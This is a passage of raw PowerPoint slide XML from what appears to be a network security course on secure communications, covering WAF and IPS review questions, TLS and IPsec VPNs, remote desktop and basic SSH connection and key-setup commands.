          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You need to deploy an appliance WAF to protect a web server farm without making any layer 3 addressing changes. Is WAF functionality supported by appliances and, if so, what device attribute should the appliance support?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What IPS mechanism can be used to block traffic that violates policy without also blocking the traffic source?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>True or false? When deploying a non-transparent proxy, clients must be configured with the proxy address and port.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is meant by scheduling in the context of load balancing?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12783671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1676D-DB8A-0AFF-158D-68979549BAEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="95321"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 5C - Secure Communications</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{784AA7E9-D38A-6EF6-261C-79C5050F8EAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1256418"/>
            <a:ext cx="4995334" cy="2578982"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are also cases where a user needs to remotely access an individual host. This most commonly allows administrators to remotely manage workstations, servers, and network appliances, but it can also provide ordinary users access to a desktop.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote Access Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 387">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{850C6B8E-E03A-874D-D24A-467943E65256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1256418"/>
            <a:ext cx="4995862" cy="2473501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 388">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{026883D1-558B-18D5-38E8-7C220227CB4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2578100" y="4110919"/>
            <a:ext cx="4978400" cy="2651760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="193141761"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk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2ADD4-98B6-CCFA-2EF6-B82B98541F56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="0"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Transport Layer Security Tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{327ADEFA-4766-ED6A-946A-E37BDDC938E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="1090811"/>
            <a:ext cx="4995334" cy="3649134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A transport layer security (TLS) VPN means the client connects to the remote access server using digital certificates. The server certificate identifies the VPN gateway to the client. Optionally, the client can also be configured with its own certificate. This allows for mutual authentication, where both server and client prove their identity to one another. TLS creates an encrypted tunnel for the user to submit authentication credentials. These would normally be processed by a RADIUS server. Once the user is authenticated and the connection is fully established, the VPN gateway tunnels all communications for the local network over the secure socket.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 395">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A1AB6FB-3FD3-F517-5E6B-4C527CE083A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821363" y="1090812"/>
            <a:ext cx="4478337" cy="2577914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 396">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0DB896E-40D6-1960-B2FA-6E2E6FBB3942}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5821363" y="3826550"/>
            <a:ext cx="3780049" cy="3031450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4299391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FB28-1639-AE1E-5835-A1053C90FBCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="0"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Internet Protocol Security Tunneling</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8452EBEC-8B64-E4A1-16D7-835BD8C97724}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685802" y="986367"/>
            <a:ext cx="4995334" cy="3649134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>There are two core protocols in IPsec, which can be applied singly or together, depending on the policy:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Authentication Header (AH)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>Encapsulating Security Payload (ESP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>IPsec can be used in two modes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Transport mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Tunnel mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 403">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F765B839-C02D-1BE6-CFF4-12E5FB3727C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1154642"/>
            <a:ext cx="5004435" cy="603250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 404">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E01EC8B7-9276-C143-2355-B293A809ABB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6068695" y="1989138"/>
            <a:ext cx="5031740" cy="633730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 409">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC30E6D9-EE43-1AD3-DB6B-1029DEC42999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6204586" y="2912534"/>
            <a:ext cx="4612640" cy="2663825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10560876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C3E5-D2EE-2073-1FCD-78DB4CEA2450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Internet Key Exchange</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 410">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8EFCA47-9D84-C8AF-6675-6A986B828258}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="550249" y="1727200"/>
            <a:ext cx="10701951" cy="4851399"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3758086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C9523-C897-9F6A-C326-5D6779FAEED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Information Security Business Units</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CE4E3AE-948D-8217-34F7-95E8AC9AC6AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1226988" y="1892300"/>
            <a:ext cx="9568012" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26731956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9D5415-D34F-0622-CAA3-D661C30AB2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remote Desktop</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9CA1783-7CA8-6C4A-A5D1-617715470A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142067"/>
            <a:ext cx="10744199" cy="4576233"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A remote access VPN joins the user’s PC or smartphone to a remote private network via a secure tunnel over a public network. Remote access can also be a means</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of connecting to a specific computer over a network. This type of remote access involves connecting to a terminal server on a host using software that transfers shell data only. The connection could be a client and terminal server on the same local network or across remote networks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A graphical remote access tool sends screen and audio data from the remote host to the client and transfers mouse and keyboard input from the client to the remote host. Microsoft’s Remote Desktop Protocol (RDP) can be used to access a physical machine on a one-to-one basis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alternatively, a site can operate a remote desktop gateway that facilitates access to virtual desktops or individual apps running on the network servers. RDP connections are encrypted by default. There are several popular alternatives to Remote Desktops. Most support remote access to platforms other than Windows (macOS and iOS, Linux, Chrome OS, and Android, for instance). Examples include TeamViewer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>teamviewer.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) and Virtual Network Computing (VNC), which is implemented by several different providers (notably </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>realvnc.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the past, these remote desktop products required a dedicated client app. Remote desktop access can now just use a web browser client. The canvas element introduced in HTML5 allows a browser to draw and update a desktop with relatively little lag. It can also handle audio. This is referred to as an HTML5 VPN or as a clientless remote desktop gateway (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>guacamole.apache.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>). This solution uses a</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>protocol called WebSocket, which enables bidirectional messages to be sent between the server and client without requiring the overhead of separate HTTP requests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21165560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9F701-827A-410A-D940-00856B4DD409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secure Shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 411">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16C3482C-61C5-AEA0-B39F-D4AA8487CBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1181100" y="2656844"/>
            <a:ext cx="8813800" cy="3718556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25187846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C9FDC-3B77-8FCD-CC72-3B113D540B83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SSH Commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72DA0575-1C3F-DF35-CC30-437D36F8F9B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSH commands are used to connect to hosts and set up authentication methods. To connect to an SSH server at 10.1.0.10 using an account named “bobby” and password authentication, run:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>bobby@10.1.0.10</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following commands create a new key pair and copy it to an account on the remote server:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ssh-keygen -t </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>rsa</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ssh-copy-id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
